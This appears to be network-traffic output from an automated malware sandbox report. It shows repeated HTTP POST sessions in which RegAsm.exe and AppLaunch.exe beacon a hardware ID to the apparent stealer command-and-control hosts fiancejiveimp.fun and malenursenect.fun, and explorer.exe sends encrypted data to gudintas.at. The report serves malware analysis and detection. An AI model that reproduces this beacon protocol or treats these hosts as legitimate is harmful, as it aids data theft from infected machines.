                                                                                                        Oct 3, 2023 18:02:58.847258091 CEST4900INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:58 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=jhbt7dh4qrlu2qb0q4h0to0f8j; expires=Sat, 27 Jan 2024 09:49:37 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:58 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UPrfiIz0Rq0Ay1fZ5Cqp32QCLpJk3MOsnf33w5AbGvEc7DVSwlZFbVXG00UWcmgtj3D%2FIxG%2FnMaUBRiUaIi%2BStWqjvSQwet0BkZZQfOKhilJmCQJba91Vs%2F42dK%2BaCxbyOnYPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8106699b381e56e6-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:58.847296000 CEST4900INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        58192.168.2.349878172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:58.551646948 CEST4894OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:58.552074909 CEST4894OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:58.950978994 CEST4903INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:58 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=16dnp095cltq9bj0m55rl9gp6v; expires=Sat, 27 Jan 2024 09:49:37 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:58 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Zw%2BNYmrzspvX6CNeRyXikhIFaUO%2Bia18n%2BqkQFD0wvr17dsDtJ4bterzlQXa2NgYXew881P%2Fxzp9nuOBioul1%2FNlwYyXoTCbKN8EwP%2FiXwD1fCt6f%2F2duCVREb%2BF6kx5FmjKGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8106699c2e4c5734-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:58.951039076 CEST4903INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        59192.168.2.349880172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:59.061306000 CEST4904OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:02:59.061748028 CEST4904OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:59.382268906 CEST4907INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:59 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=rsmnbrr6hu0v4mf93djqt8ja6m; expires=Sat, 27 Jan 2024 09:49:38 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:59 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T408E88qU3JF3hnAua%2F52jNhmuHLMjXHSRG%2FZYT9srY8xMzFZvIwUgWE%2FcaCklCFwggF124WLcpBsA6SPTu37AowpfS49heRPadHO1o5EnAdcENy05IaFXU3Fer3T5N5g4MYdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8106699f5af305e6-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:59.382333040 CEST4907INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        6192.168.2.349822189.232.58.10380C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:28.520530939 CEST314OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://vbuoguprst.org/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 302
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:02:28.520560980 CEST315OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 51 0a c0 93
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA -[k,vuQ{m$6q1["/7T?@PZv.L0~?18u#[k-O3?T?c%7&Y]=eJ!2_0
                                                                                                        Oct 3, 2023 18:02:29.219532013 CEST315INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:02:28 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 331
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        60192.168.2.349881172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:59.170874119 CEST4905OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:59.171250105 CEST4906OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:59.564811945 CEST4908INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:59 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=dbk32ceo8jse9fqs3jdhhu4rfp; expires=Sat, 27 Jan 2024 09:49:38 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:59 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ewkUV2fSzv%2FbSqbKXIe4nh2Z2Pz3sDo4aqzZ9VZxDC6QjgFO2VUz%2BZCs4Mnb8GGa4mfFr1fQX9AWSbOLdkgaQqTy2uDLgz9dHzoNAjw47Fs6XqjGejZvzJOxggPXhgbHKSGsCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669a00f0f5afe-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:59.564877987 CEST4908INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        61192.168.2.349882172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:59.629100084 CEST4909OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:02:59.629554033 CEST4910OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:05.756474018 CEST4927INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:05 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=jmdvb36sp1fcm3nbe5i2669k24; expires=Sat, 27 Jan 2024 09:49:38 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:05 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qfxVU%2Bdt0HbbBXPCMXv2XkIROGLWNUEHxVaiszSZrYe3ze2Jf1rXYpRtfnpCNms4PEmDPrTGfTGix7o3fdjdtlEG%2BMcioZ8QnTpsmYDuramqssVDiE2oSs7bhB1XxXvJcIzgWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669a2e9a20816-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:05.756491899 CEST4927INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        62192.168.2.349883172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:59.792160034 CEST4910OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:59.793621063 CEST4911OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:00.190222025 CEST4912INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:00 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=v0n4rust816m2l9uq14fa1qg5t; expires=Sat, 27 Jan 2024 09:49:39 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:00 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kJVbj15r5HSSG4GKMKTMM15ydomzZNUfBz2A3UD5BQM804zypdcF1fgfsoCGXYEQX6pV5jwARYdT%2FGiKpdXdEAYCeFF4NwRgiVcFKkoV%2BhK6z%2BySTZyyLP2PV2qEBKfcHomRNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669a3eef081eb-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:00.190269947 CEST4912INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        63192.168.2.349884104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:00.679527044 CEST4913OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:03:00.684148073 CEST4913OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:01.056703091 CEST4915INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:00 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=6kgdonhecuk6v9hk8lcimse2s2; expires=Sat, 27 Jan 2024 09:49:39 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:00 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NunmWg6w7wPYA3vsiXT4DLtz8pcA6B7gbXD5jqkXdPwENRR3NZ3WYc06SqFVnnC%2FxkJNgeP8nS7rRNHlDB9voiAMQFEIwLr2GoIIY56n8TzlovVAIB2aFU7AUJUBlG%2F1z7zNdg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669a97c1d3894-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:01.056751013 CEST4915INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        64192.168.2.349885172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:01.613476038 CEST4915OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:03:01.613933086 CEST4916OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:01.962044954 CEST4917INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:01 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=9noldrs16hpcq8l4k2a4c37396; expires=Sat, 27 Jan 2024 09:49:40 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:01 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mCV5Q%2B0359MyNYu5MKErkV%2FDTVUJKb64i%2FN5iA6cGYlmTpmLdUPgKuH27HX9cnkvhEr4qdDpF%2Bp1%2FGTKeRiDfngRuvRrtR9b0ADLfoDg%2BrpsQiUN%2F3AQL1vmoNTABEk%2FMpirpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669af4f5c2063-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:01.962112904 CEST4917INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        65192.168.2.349886104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:02.176198006 CEST4918OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:03:02.176556110 CEST4919OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
